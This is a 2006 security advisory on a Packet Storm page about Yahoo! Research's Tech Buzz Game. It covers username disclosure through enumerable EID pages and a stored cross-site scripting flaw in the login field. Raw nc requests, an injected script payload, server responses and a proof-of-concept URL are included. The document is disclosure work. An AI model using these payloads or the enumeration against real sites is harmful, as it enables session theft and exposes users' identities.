exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

yahooxss.txt

yahooxss.txt
Posted Aug 27, 2006
Authored by Simo64

Yahoo Research suffers from a cross site scripting vulnerability.

tags | advisory, xss
SHA-256 | 8aab3127ccde7487cf100991b18a4b6e67ce1a3fe226ef69589be14fc5c46e7b

yahooxss.txt

Change Mirror Download
Title: Yahoo! Research Multiple vulnerabilites

Authors: Simo64 and Simo Ben youssef
Contacts : <simo64_at_morx_org> / <simo_at_morx_org>
Discovered: 02 Aout 2006
Published: 17 Aout 2006
MorX Security Research Team
Original Advisory:
http://www.morx.org/YahooResearchMultiple.txt
http://www.morx.org

Service/Product: The Tech Buzz Game

Vendors: Yahoo! Research and O'Reilly Media

Vulnerability: Cross Site Scripting / Users Information Disclosure

Severity: Law/Medium

Tested on: Microsoft IE 6.0 firefox 1.5 and Opera
(should work on all browsers)


Description:

The Tech Buzz Game is a fledgling research project and demo, rather than a
full-fledged Yahoo! product, and it's a product of Yahoo! Research and
O'Reilly Media. The marketplace software is powered by Newsfutures. Buzz
scores are powered by Yahoo! Search technology and Yahoo! Search Web
Services. The buzz scoring methodology was originally developed for the
Yahoo! Buzz Index, which tracks web search spikes and trends

for more details, visit:

http://buzz.research.yahoo.com/dm/info/about.html

Details:

1- Usernames disclosure

the login2.html script is writting in a way to store users error
information in login.html. if a user fails to sign in to the game, the
error returned by login2.html with the username will be stored in
login.html. login.html assign each request with an EID numerical value, in
fact those information are accessible to anyone thru HTTP

from login.htm source code

<td valign="top" align="center" >
<form action=hlogin2.html method=post>
<input type=hidden name=cmd value=Domain.login>
<input type=hidden name=error.page value=login.html> <--- stores
informations back in login.html

Example:

C:\>nc buzz.research.yahoo.com 80
GET /dm/login/login.html?eid=100 HTTP/1.1
Host: 127.0.0.1
Connection: Closed

HTTP/1.1 200 OK
Date: Thu, 17 Aug 2006 14:40:46 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7
Transfer-Encoding: chunked
Content-Type: text/html

1d84
--------------------- Scroll down ------------------------
<td align="left" scope="col">Username:</td>
<td align="left" scope="col"><input type="text" name="login"
value='wil*******' /></td> <--- a previously stored yahoo ID

<td class="error" align="left" scope="col"></td>

PoC:

http://buzz.research.yahoo.com/dm/login/login.html?eid=[some-random-numbers]

2- Permanent Cross Site Scripting:

login2.html doesnt only store informations and make them accessible
publicly thru login.html but also it fails to properly sanitize
user-supplied input when passed thru the variable "login". after
successful script injection the input will be stored in login.html with a
specific EID

example:

C:\>nc buzz.research.yahoo.com 80
POST /dm/login/login2.html HTTP/1.1
Host: 127.0.0.1
Content-Length: 78
Connection: Closed

cmd=Domain.login&error.page=login.html&login=''><script>alert("a")</script>&pw=a

HTTP/1.1 302 Found
Date: Thu, 17 Aug 2006 15:10:47 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a
Location: /dm/login/login.html?eid=182
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

120
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/dm/login/login.html?eid=182">here</A>.<P>
<HR>

ok now lets get login.html?eid=182 to see if our script was filtered or no

C:\>nc buzz.research.yahoo.com 80
GET /dm/login/login.html?eid=182 HTTP/1.1
Host: 127.0.0.1
Connection: Closed

HTTP/1.1 200 OK
Date: Thu, 17 Aug 2006 13:14:18 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a
Transfer-Encoding: chunked
Content-Type: text/html

1d98




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
--------------------------Scroll Down ------------------------

Sorry, login failed.</td>
</tr>

<tr>
<td scope="col" align="left" colspan="4">&nbsp;</td>
</tr>
<tr>
<td scope="col" align="left">&nbsp;</td>
<td align="left" scope="col">Username:</td>
<td align="left" scope="col"><input type="text" name="login"
value='''><script>alert("a")</script>' /></td> <--- not filtred

PoC:

http://www.morx.org/yahooXSSinject.html

Note: the form will need the user to click to submit, an attacker may use
a form which will auto-submit the js, using for example the onload
attribute

Impact:

an attacker can exploit the vulnerable script to have arbitrary script
code executed in the browser of an authentified yahoo user in the context
of the vulnerable yahoo website. resulting in the theft of cookie-based
authentication giving the attacker full access to the victim's accounts
(email box, etc) as well as other type of attacks.

workaround:

avoid clicking on links while being signed in yahoo

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close